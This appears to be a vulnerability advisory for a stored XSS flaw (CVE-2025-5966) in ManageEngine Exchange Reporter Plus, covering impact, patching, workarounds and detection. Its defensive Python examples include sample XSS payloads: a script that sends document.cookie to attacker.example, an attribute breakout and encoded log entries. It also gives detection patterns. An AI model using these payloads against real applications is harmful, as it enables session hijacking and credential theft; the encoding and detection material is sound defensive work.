CVE-2025-5966

8.1 HIGH

📋 TL;DR

This vulnerability allows attackers to inject malicious scripts into the 'Attachments by filename keyword' report feature in ManageEngine Exchange Reporter Plus. When users view these reports, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. Organizations using Exchange Reporter Plus versions 5722 and below are affected.

💻 Affected Systems

Products:
  • Zohocorp ManageEngine Exchange Reporter Plus
Versions: 5722 and below
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: All installations with the vulnerable version range are affected regardless of configuration.

📦 What is this software?

ManageEngine Exchange Reporter Plus is Zoho's web-based reporting, change-auditing and monitoring tool for Microsoft Exchange Server and Exchange Online. Its report builder lets an authenticated user define custom reports, including the 'Attachments by filename keyword' report in which this vulnerability lives; the reports are then viewed in the browser by other users, which is why a stored script in a report definition reaches administrators.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers could hijack administrator sessions or phish administrator credentials from within the application, pivot to internal systems, install backdoors, or exfiltrate sensitive Exchange server data.

🟠 Likely Case

Session hijacking leading to unauthorized access to Exchange Reporter Plus, potential data exposure, and limited lateral movement within the application.

🟢 If Mitigated

Once the filename keyword is HTML-encoded when a report is rendered, the injected content is displayed as text and no script executes; what remains is the nuisance of an authenticated user creating misleadingly named or junk reports.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No
Complexity: LOW

Exploitation requires authenticated access to create malicious reports, but the attack is straightforward once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5723 or later

Vendor Advisory: https://www.manageengine.com/products/exchange-reports/advisory/CVE-2025-5966.html

Restart Required: Yes

Instructions:

1. Back up the current installation before changing anything.
2. Download the latest build from ManageEngine's website.
3. Run the installer to upgrade to build 5723 or later.
4. Restart the Exchange Reporter Plus service and confirm the new build number in the console.

🔧 Temporary Workarounds

Input Validation Filter (applies to: all platforms)

Server-side validation of the filename keyword before it is stored or processed, rejecting or normalising values that contain markup.

Output Encoding (applies to: all platforms)

HTML encoding of all user-controlled data at the point where it is rendered into a report, using the encoding appropriate to the context it lands in (element content, quoted attribute value).

Both of these are code-level changes inside the product. An operator of a closed installation cannot implement them and should not expect a configuration switch for them; the operator-side options are the ones listed under "If You Can't Patch".
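To make the output-encoding point concrete, the following is an added Python illustration written for this page; it is not the product's own (Java) code and does not claim to reproduce the vendor's patch. It renders a report row from a stored filename keyword first without encoding, then with HTML encoding, and checks which variants still contain live markup. The sample keywords, the table template and the function names are constructed for the example.

```python
import html

# Constructed sample inputs: strings a report creator might type into the
# "Attachments by filename keyword" field. The payloads are generic XSS
# shapes written for this example, not ones taken from any public exploit.
SAMPLE_KEYWORDS = [
    "invoice.pdf",
    "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
    '" onmouseover="alert(1)',
]


def render_row_unsafe(keyword: str) -> str:
    """Vulnerable pattern: the stored keyword is interpolated verbatim into
    both element content and an attribute value of the report table."""
    return f'<tr><td title="{keyword}">{keyword}</td></tr>'


def render_row_safe(keyword: str) -> str:
    """Hardened pattern: HTML-encode on output. quote=True also encodes
    double and single quotes, so the value cannot terminate the title
    attribute and start a new one (the second sample payload above)."""
    enc = html.escape(keyword, quote=True)
    return f'<tr><td title="{enc}">{enc}</td></tr>'


def has_injected_markup(rendered: str) -> bool:
    """The fixed template contributes exactly four '<' and two '"'. Any
    extra raw '<' or '"' in the rendered row came from the keyword and
    means the browser will parse attacker-controlled markup."""
    return rendered.count("<") != 4 or rendered.count('"') != 2


def audit(keywords=SAMPLE_KEYWORDS):
    """Render each keyword both ways. Returns a dict
    {keyword: (unsafe_has_live_markup, encoded_has_live_markup)}."""
    return {
        k: (has_injected_markup(render_row_unsafe(k)),
            has_injected_markup(render_row_safe(k)))
        for k in keywords
    }


if __name__ == "__main__":
    for k, (unsafe_live, safe_live) in audit().items():
        print(f"{k[:40]!r:45} unsafe={unsafe_live} encoded={safe_live}")
```

The check deliberately covers two contexts, element text and a quoted attribute, because the attribute-breakout payload contains no `<` at all and would pass a filter that only looks for tags. HTML entity encoding is the right answer for those two contexts only; a keyword that ends up inside a JavaScript string or a URL in the report needs the encoding for that context instead.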

🧯 If You Can't Patch

  • Restrict report creation to the smallest set of trusted administrators. Exploitation needs an account that can create reports, so audit which roles and accounts hold that right and remove it where it is not needed.
  • Put a web application firewall (WAF) with XSS rules in front of the web interface. This only filters the payload shapes the rules recognise and only traffic that traverses the WAF; it lowers the likelihood of exploitation but does not remove the flaw.

🔍 How to Verify

Check if Vulnerable:

Open the Exchange Reporter Plus admin console and read the build number under Help > About; builds 5722 and below are affected.

Check Version:

No command-line or file-based check is documented here; use the build number shown in the web interface.

Verify Fix Applied:

Confirm the build number is 5723 or higher, then create a test report whose filename keyword contains a harmless marker (for example a literal <script> tag) and confirm the rendered report shows the marker as plain text with no script execution.

📡 Detection & Monitoring

Log Indicators:

  • Unusual report creation patterns
  • Requests containing script tags in filename parameters

Network Indicators:

  • HTTP requests with JavaScript payloads in report-related endpoints

SIEM Query:

source="exchange_reporter_plus" AND (url="*report*" AND (param="*<script>*" OR param="*javascript:*"))

The source and field names above are placeholders to map onto your own log source. Payloads in requests are usually URL-encoded, so match the encoded forms too (for example %3Cscript and javascript%3A), and remember that parameters sent in a POST body do not appear in standard web access logs; the product's own application or audit logs are needed to see those.
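The following is an added Python example of the detection logic the log and SIEM indicators above describe, written for this page rather than taken from the product or any vendor tooling. It scans constructed access-log lines, keeps only requests to report-related paths, percent-decodes each query parameter until stable so that double-encoded payloads are normalised, and flags values that match the `<script>`, `javascript:` and inline-event-handler patterns. The log format, the `/reports/attachments` path and the `keyword` parameter name are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in a simplified access-log shape:
# "<client> <method> <path?query> <status>". They are not real Exchange
# Reporter Plus logs; the /reports/attachments path and the "keyword"
# parameter are assumptions made for this example.
SAMPLE_LOG = """\
10.0.0.5 GET /reports/attachments?keyword=invoice.pdf 200
10.0.0.7 GET /reports/attachments?keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E 200
10.0.0.7 GET /reports/attachments?keyword=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E 200
10.0.0.9 GET /login?user=bob 302
10.0.0.7 GET /reports/attachments?keyword=javascript%3Aalert(1) 200
"""

# Indicators matching the SIEM query above, plus inline event handlers,
# which a plain "<script>" match misses.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I),  # <tag ... onXXX=
]
REPORT_PATH = re.compile(r"/report", re.I)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded payloads are normalised before pattern matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious(log_text: str):
    """Scan report-endpoint requests and return one tuple
    (client, param, decoded_value, matched_pattern) per flagged parameter."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, _method, target, _status = parts[:4]
        url = urlsplit(target)
        if not REPORT_PATH.search(url.path):
            continue
        # parse_qsl decodes one layer; fully_decode strips any further layers.
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw)
            for pat in XSS_PATTERNS:
                if pat.search(value):
                    hits.append((client, name, value, pat.pattern))
                    break
    return hits


if __name__ == "__main__":
    for client, param, value, pattern in find_suspicious(SAMPLE_LOG):
        print(f"{client} {param}={value!r} matched {pattern}")
```

On the sample input the first line (an ordinary filename) and the login request are ignored, while the three requests from 10.0.0.7 are flagged, including the double-encoded `<img ... onerror=>` payload that a single-decode match on `<script>` would miss. Because the product stores the keyword and replays it to every viewer, one flagged request is worth treating as a stored-XSS attempt and checking the saved report definitions, not just the request log.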
